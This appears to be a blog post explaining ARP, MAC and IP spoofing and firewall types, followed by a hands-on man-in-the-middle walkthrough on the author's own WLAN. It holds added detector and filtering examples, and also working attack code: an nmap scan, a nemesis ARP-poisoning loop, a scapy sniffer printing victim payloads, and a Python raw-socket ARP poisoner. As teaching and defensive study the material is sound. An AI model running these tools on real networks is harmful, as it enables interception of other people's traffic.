Spoofing on the network

Posted by tzul at 2020-04-13

First, some background taken from Wikipedia; then we try a man-in-the-middle attack.

Theoretical basis

Prerequisites: understand the layered architecture of computer networks, and be in the habit of using a search engine to look things up.

The following is from Wikipedia

ARP Spoofing

A technique in which an attacker sends forged ARP messages on a LAN, usually to associate the attacker's MAC address with the IP address of another host, so that traffic meant for that host's IP address is delivered to the attacker instead.

ARP spoofing lets an attacker intercept data frames on a local area network (LAN), modify the traffic, or stop it altogether. It is often the opening move for other attacks such as denial of service (DoS), man-in-the-middle (MITM) or session hijacking.

The attack is limited to network segments that use ARP.

On a LAN, the IP address used at the network layer has to be mapped to a MAC address before a frame can be sent at the data link layer. When a host knows the IP address of a peer but not its MAC address, it broadcasts an ARP request; the peer answers with an ARP reply that contains the MAC address for that IP.

ARP is stateless: hosts cache any ARP reply they receive, whether or not they asked for it, and even a cache entry that has not expired is overwritten by a newer reply. The host has no way to authenticate the source of the packet.

Such an attack may come from a compromised machine on the LAN or directly from the attacker's own host. The usual goal is to bind the attacker's MAC address to the target's IP address, so that traffic addressed to the target is delivered to the attacker, who can then read, modify or drop it.

Defensive measures include:

On Windows, the ARP cache behaviour is tuned by the following values under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters: ArpCacheLife, ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute, ArpRetryCount.
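As an added example (not part of the original post), here is the check a defender runs against exactly the weakness just described: the ARP cache accepts any reply, so keep a separate table of IP-to-MAC bindings and alert when a binding changes or when one MAC starts answering for several IPs. The MAC addresses are the ones used later in this post; the IP addresses, the function name `detect_arp_spoofing` and the observation list are assumptions made for the example.

```python
# Added example (not from the original post): a minimal ARP-spoofing detector.
# It keeps its own IP -> MAC table from observed ARP replies and flags the two
# symptoms of poisoning that the stateless ARP cache itself never checks:
#   1. an IP whose MAC changes, and
#   2. one MAC that claims more than one IP (a MITM attacker claims both the
#      gateway's and the victim's address).
# The observations below are constructed sample data, not a real capture.
from collections import defaultdict

def detect_arp_spoofing(replies, known_multi_ip_macs=frozenset()):
    """replies: iterable of (sender_ip, sender_mac) taken from ARP replies
    (opcode 2), in the order they were seen.  Returns a list of alert strings."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        # Symptom 1: a binding that changes.  A legitimate NIC swap also trips
        # this, so treat it as "investigate", not as proof.
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            alerts.append(f"{ip} moved from {old} to {mac}")
        ip_to_mac[ip] = mac
        # Symptom 2: one MAC answering for several IPs.  Routers and hosts
        # with IP aliases do this legitimately, so allow a whitelist.
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1 and mac not in known_multi_ip_macs:
            alerts.append(f"{mac} claims {sorted(mac_to_ips[mac])}")
    return alerts

# Constructed sample (IPs assumed): gateway and phone answer normally, then the
# attacker (E8:39:...) sends replies claiming both addresses, as the loop in
# the post does.
SAMPLE_REPLIES = [
    ("192.168.1.1",  "68:5d:43:2e:aa:59"),  # gateway
    ("192.168.1.23", "ec:88:8f:b4:d6:68"),  # phone
    ("192.168.1.1",  "e8:39:df:08:f4:fb"),  # attacker claims the gateway's IP
    ("192.168.1.23", "e8:39:df:08:f4:fb"),  # attacker claims the phone's IP
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES):
        print("ALERT:", alert)
```

To run it live, feed it from scapy with `sniff(filter="arp", prn=...)` and pass `(pkt[ARP].psrc, pkt[ARP].hwsrc)` for every packet whose `pkt[ARP].op == 2`; on Linux, `ip neigh` shows the kernel's current cache for comparison.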

MAC Spoofing

A technique for changing the MAC (media access control) address of a network interface. The MAC address is burned into the network interface controller and cannot itself be changed, but the operating system can be made to use a MAC address chosen by the user. This effectively changes the network identity of the computer, and it is quite simple to do.

It is usually done to get past an access control list on a server or router, to hide a computer, or to impersonate another network device. Sometimes this is legitimate and sometimes it is not.

A host with a spoofed MAC address can normally also receive the traffic sent to that address (although some switch security configurations can block such frames). MAC address spoofing only works within the local broadcast domain.

IP Spoofing

The forging of the source address in IP packets, either to hide the identity of the sender or to impersonate another machine.

By changing the source address field in the IP header, the attacker makes the packet appear to come from another machine. The machine that receives the forged packet sends its reply to that other machine, not to the attacker. Usually the attacker either does not care about the replies or can predict them reliably.

Under some circumstances the attacker can see the replies or redirect them to his own machine; this is most often the case on a local wired or wireless LAN.

IP spoofing is frequently used in DoS attacks, because packets arriving from many different forged addresses are hard to filter, which defeats IP-address-based defences. Backscatter, a technique for observing such attacks statistically from the replies that forged-source packets provoke, relies on attackers using invalid addresses; more sophisticated attacks avoid invalid addresses altogether.

IP spoofing is also used to bypass IP-address-based authentication. Against remote systems this is hard to pull off, because the attacker would have to alter thousands of packets in flight, but between trusted machines on an intranet it is very effective.

IP spoofing is also used legitimately, in website performance testing, to simulate many different clients.

Services vulnerable to IP spoofing include:

Defensive measures
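As an added example (not part of the original post or of Wikipedia's text), here is IP source spoofing at the byte level together with the ingress-filtering check that catches it. `build_ipv4_header` writes a valid IPv4 header with whatever source address the caller claims, and `ingress_filter` applies the rule a border router uses: a packet arriving from the outside must not carry an internal source address, and a packet leaving the LAN must not carry a foreign one. Nothing is sent on the wire; the addresses, the `/24` prefix and all function names are assumptions for the example.

```python
# Added example (not from the original post): IP source spoofing at the byte
# level, and the ingress/egress filter that catches it.  Pure stdlib; no
# packets are sent.  All addresses and the LAN prefix are made up.
import ipaddress
import struct

def ipv4_checksum(data: bytes) -> int:
    """RFC 791 header checksum: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4_header(src: str, dst: str, proto: int, payload_len: int, ttl: int = 64) -> bytes:
    """20-byte IPv4 header without options.  Nothing here stops src from being
    any address at all: that is the whole of IP spoofing."""
    ver_ihl = (4 << 4) | 5                  # version 4, 5 x 32-bit words
    hdr = struct.pack("!BBHHHBBH4s4s",
                      ver_ihl, 0, 20 + payload_len, 0, 0, ttl, proto, 0,
                      ipaddress.IPv4Address(src).packed,
                      ipaddress.IPv4Address(dst).packed)
    csum = ipv4_checksum(hdr)               # computed with the checksum field zeroed
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]

def parse_ipv4(pkt: bytes) -> dict:
    """Pull out the fields a filter looks at; checksum_ok is True when the
    one's-complement sum over the whole header (checksum included) is zero."""
    ver_ihl, _tos, _tlen, _id, _frag, ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return {"src": str(ipaddress.IPv4Address(src)),
            "dst": str(ipaddress.IPv4Address(dst)),
            "proto": proto, "ttl": ttl,
            "checksum_ok": ipv4_checksum(pkt[:20]) == 0}

INTERNAL = ipaddress.ip_network("192.168.1.0/24")   # assumed LAN prefix

def ingress_filter(pkt: bytes, arrived_from_outside: bool, internal=INTERNAL) -> str:
    """Returns 'accept' or 'drop: <reason>'.  This is the BCP 38 style rule:
    a router knows which prefixes legitimately live on each side of it."""
    h = parse_ipv4(pkt)
    if not h["checksum_ok"]:
        return "drop: bad checksum"
    src = ipaddress.ip_address(h["src"])
    if arrived_from_outside and src in internal:
        return "drop: external packet claims internal source"
    if not arrived_from_outside and src not in internal:
        return "drop: outbound packet with foreign source (egress filtering)"
    return "accept"

if __name__ == "__main__":
    spoofed = build_ipv4_header("192.168.1.23", "192.168.1.50", 6, 0)  # claims to be a LAN host
    print(parse_ipv4(spoofed))
    print("from Internet:", ingress_filter(spoofed, arrived_from_outside=True))
    print("from LAN:     ", ingress_filter(spoofed, arrived_from_outside=False))
```

The egress rule is the one that matters for the DoS case above: if every network dropped outbound packets whose source is not its own, forged-source floods could not leave their origin network.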

Email Spoofing

I'll come back to this later; in fact I thought of it when the Git server we built on the intranet sent me an email and I received it.

URL Spoofing

I'll cover this later too. It reminds me of the dirty-flow URL hacking on the dark cloud.

Firewalls

Historically, firewall development falls into three generations:

Packet filtering. This first generation of firewall inspects individual packets only. If a packet matches a rule it is dropped (discarded silently) or rejected (an error is returned). Rules are typically written in terms of source address, destination address, protocol and, for TCP and UDP, port numbers. The firewall keeps no information about connections: it is stateless.

This generation works mainly in the bottom three layers and only glances at the transport layer for source and destination ports.

Stateful filtering. Besides everything the first generation does, it also works at OSI layer 4, the transport layer, and uses the state of the connection as a criterion. It holds packets until it has seen enough of them to determine the connection state, records every connection that passes through, and decides whether a packet is the start of a new connection, part of an existing one, or neither.


Application-level filtering. An application-layer firewall understands the upper-layer protocols, so it can detect an illegitimate protocol trying to cross the firewall over a legitimate port. The much-touted next-generation firewall (NGFW) extends and deepens this inspection of the application-layer stack.

Firewalls can also be classified by where they intercept communication and how they track state:

Network-layer or packet filters work at the relatively low TCP/IP layers and filter by rules. There are two kinds:

Stateful: keeps the current connection phase and the source and destination addresses and ports. A packet that does not belong to an existing connection is evaluated by the rules for new connections; a packet that belongs to a known connection is handled according to that connection.

Stateless: needs less memory and is faster, and suits connectionless protocols, but cannot make complex decisions based on communication state. iptables is often given as an example, although with its conntrack module it is in fact stateful.

Application-layer firewalls intercept inter-process communication at the socket level and filter it by rules. They cannot defend against exploitation of lower-layer vulnerabilities and are being replaced by mandatory access control (MAC) application firewalls, i.e. sandboxes.

Proxy: whether dedicated hardware or software, a proxy works by answering incoming packets on behalf of an application. A proxy server is a gateway from one network to a specific network application on another, acting on behalf of the users of the network. A proxy isolates the internal network from the external one more completely, but an attacker who compromises a machine and turns it into a proxy can use it to reach the internal network.

NAT (network address translation): firewalls usually provide this too, and the machines behind a firewall usually have private IP addresses. Introduced to relieve the shortage of IPv4 addresses, it has unexpectedly become an important defence against network reconnaissance.
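As an added example (not part of the original post), the difference between the first and second generation above, on constructed sample traffic: a stateless filter has no memory of the outbound SYN, so to let replies in it has to admit any inbound segment carrying ACK, which is exactly what an attacker sets on a forged packet; a stateful filter keeps a connection table and admits inbound traffic only for connections the LAN opened. The policy, the addresses and the names `stateless_filter`, `StatefulFilter` and `run_sample` are assumptions for the example.

```python
# Added example (not from the original post): a stateless packet filter beside
# a stateful one, run over constructed sample traffic.  Policy: the LAN may open
# TCP connections to the Internet, the Internet may not open connections to
# the LAN.  Timeouts and FIN/RST teardown are left out so the table logic
# stays visible.  All addresses are made up.
from collections import namedtuple

# direction is "out" (LAN -> Internet) or "in"; flags is a string such as "S", "SA", "A"
Pkt = namedtuple("Pkt", "direction src sport dst dport flags")

def stateless_filter(pkt):
    """First generation: decides from this packet's header fields alone."""
    if pkt.direction == "out":
        return "accept"
    # No memory of outbound SYNs, so 'established' is approximated by the ACK
    # bit.  A forged inbound packet with ACK set walks straight through.
    return "accept" if "A" in pkt.flags else "drop"

class StatefulFilter:
    """Second generation: remembers the connections the LAN opened."""
    def __init__(self):
        self.conntrack = set()   # entries: (lan_ip, lan_port, remote_ip, remote_port)

    def filter(self, pkt):
        if pkt.direction == "out":
            key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
            if pkt.flags == "S":
                self.conntrack.add(key)          # LAN host opens a new connection
                return "accept"
            # any other outbound packet must belong to a tracked connection
            return "accept" if key in self.conntrack else "drop"
        # inbound: admitted only as the reply side of a LAN-initiated connection
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        return "accept" if key in self.conntrack else "drop"

# Constructed sample traffic (addresses assumed).
LAN, SERVER, ATTACKER = "192.168.1.23", "203.0.113.5", "198.51.100.9"
SAMPLE = [
    Pkt("out", LAN, 40000, SERVER, 443, "S"),     # LAN host opens an HTTPS connection
    Pkt("in",  SERVER, 443, LAN, 40000, "SA"),    # the server's SYN/ACK reply
    Pkt("in",  ATTACKER, 1337, LAN, 22, "A"),     # forged ACK aimed at SSH
    Pkt("in",  ATTACKER, 4444, LAN, 22, "S"),     # plain inbound SYN
]

def run_sample(traffic=SAMPLE):
    """Returns [(stateless_decision, stateful_decision), ...], one per packet."""
    sf = StatefulFilter()
    return [(stateless_filter(p), sf.filter(p)) for p in traffic]

if __name__ == "__main__":
    for p, (a, b) in zip(SAMPLE, run_sample()):
        print(f"{p.direction:3} {p.src}:{p.sport} -> {p.dst}:{p.dport} [{p.flags}]  stateless={a:6} stateful={b}")
```

The third packet is the one that separates the two generations: the stateless filter accepts it, the stateful one drops it because no LAN host ever opened a connection to 198.51.100.9:1337.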

Rogue DHCP

A forged DHCP server; omitted for now.

DNS series

Covered under DNS.

Now let's try a man-in-the-middle attack. My phone and laptop are both on the WLAN.

0.0) MAC spoofing

sudo ip link set eth0 down                                  # the address can only be changed while the link is down
sudo ip link set dev eth0 address 38:AA:3C:E6:FE:69         # any locally administered address will do
sudo ip link set eth0 up                                    # needs root too, like the two commands above

(eth0 here is the wired interface; the attack below runs over wlan0, so substitute that if the wireless MAC is the one to change.)

0.1) Preparation

sudo ifconfig wlan0 promisc                          # accept frames not addressed to us
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward       # forward the victims' traffic on instead of dropping it; without this the redirect is a DoS, not a MITM

(A plain `sudo echo 1 > /proc/sys/net/ipv4/ip_forward` does not work, because the redirection is done by the unprivileged shell; hence the tee.)

1) Find the targets

sudo nmap -sS     # SYN-scan the WLAN subnet (pass it as the target) to learn the IP and MAC addresses of the gateway and the phone; run as root nmap also prints MACs for LAN hosts

2) ARP attack

The loop sends forged ARP replies (-r) in both directions: each victim is told that the other victim's IP address lives at our MAC address E8:39:DF:08:F4:FB. -S is the IP address being claimed and -D the IP address of the host receiving the reply; those two addresses were left out of the command lines, so they appear as placeholders here. -h/-H set the sender MAC in the Ethernet header and in the ARP body, -m/-M the target MAC in the same two places.

while true; do
  # tell victim A (EC:88:...) that victim B's IP is at our MAC
  sudo nemesis arp -v -r -d wlan0 -S <IP of victim B> -D <IP of victim A> -h E8:39:DF:08:F4:FB -m EC:88:8F:B4:D6:68 -H E8:39:DF:08:F4:FB -M EC:88:8F:B4:D6:68
  # tell victim B (68:5D:...) that victim A's IP is at our MAC
  sudo nemesis arp -v -r -d wlan0 -S <IP of victim A> -D <IP of victim B> -h E8:39:DF:08:F4:FB -m 68:5D:43:2E:AA:59 -H E8:39:DF:08:F4:FB -M 68:5D:43:2E:AA:59
  sleep 1     # re-poison once a second rather than flooding the WLAN
done

3) Monitoring

With scapy (as root), print source -> destination and any raw payload of the TCP packets that now pass through us; sprintf is a method of the captured packet, and the host filter takes the victim's IP address:

from scapy.all import sniff

pkts = sniff(filter="tcp and host <IP of victim A>", iface="wlan0",
             prn=lambda x: x.sprintf("{IP:%IP.src% -> %IP.dst%\n}{Raw:%Raw.load%\n}"))
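As an added example (not part of the original post), the same bidirectional poisoning as the nemesis loop above, built by hand so that every field of the forged reply is visible, plus the step the loop lacks: re-ARPing both victims with their true addresses on exit, so the WLAN is not left broken when we stop. Only frame construction runs offline; `send_loop` needs root and a real interface. The MACs are the ones from the post; the IP addresses and all function names are assumptions.

```python
# Added example (not from the original post): forged ARP replies for a
# bidirectional MITM, with a restore step on exit.  build_arp_reply() is the
# packet the nemesis command above puts on the wire; send_loop() needs root
# and a Linux AF_PACKET socket.  IP addresses are assumed; MACs are the post's.
import socket
import struct
import time

ETH_P_ARP = 0x0806

ATTACKER_MAC = "E8:39:DF:08:F4:FB"                 # our own MAC
VICTIM_A_MAC, VICTIM_A_IP = "EC:88:8F:B4:D6:68", "192.168.1.23"   # IP assumed
VICTIM_B_MAC, VICTIM_B_IP = "68:5D:43:2E:AA:59", "192.168.1.1"    # IP assumed

def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet frame carrying an unsolicited ARP reply (opcode 2) that tells
    target 'sender_ip is at sender_mac'.  The receiver has no way to check
    whether sender_mac really owns sender_ip, which is the whole attack."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,                     # HTYPE: Ethernet
                      0x0800,                # PTYPE: IPv4
                      6, 4,                  # HLEN, PLEN
                      2,                     # OPER: reply
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp

def poison_frames():
    """A is told B's IP is at our MAC; B is told A's IP is at our MAC."""
    return [build_arp_reply(ATTACKER_MAC, VICTIM_B_IP, VICTIM_A_MAC, VICTIM_A_IP),
            build_arp_reply(ATTACKER_MAC, VICTIM_A_IP, VICTIM_B_MAC, VICTIM_B_IP)]

def restore_frames():
    """Same two replies with the true MACs, so both caches heal immediately
    instead of waiting for the entries to time out."""
    return [build_arp_reply(VICTIM_B_MAC, VICTIM_B_IP, VICTIM_A_MAC, VICTIM_A_IP),
            build_arp_reply(VICTIM_A_MAC, VICTIM_A_IP, VICTIM_B_MAC, VICTIM_B_IP)]

def send_loop(iface="wlan0", interval=1.0):
    """Re-poison every `interval` seconds until Ctrl-C, then restore.
    ip_forward must already be 1, as in the preparation step."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    s.bind((iface, 0))
    try:
        while True:
            for frame in poison_frames():
                s.send(frame)
            time.sleep(interval)
    except KeyboardInterrupt:
        pass
    finally:
        for _ in range(3):                     # repeat in case a frame is lost
            for frame in restore_frames():
                s.send(frame)
            time.sleep(0.5)
        s.close()

if __name__ == "__main__":
    send_loop()
```

The restore frames spoof each victim's real MAC as the Ethernet source, exactly as the poison frames spoofed ours; that is the point of running the restore from the attacker's machine, since the victims themselves will not re-announce until their entries expire.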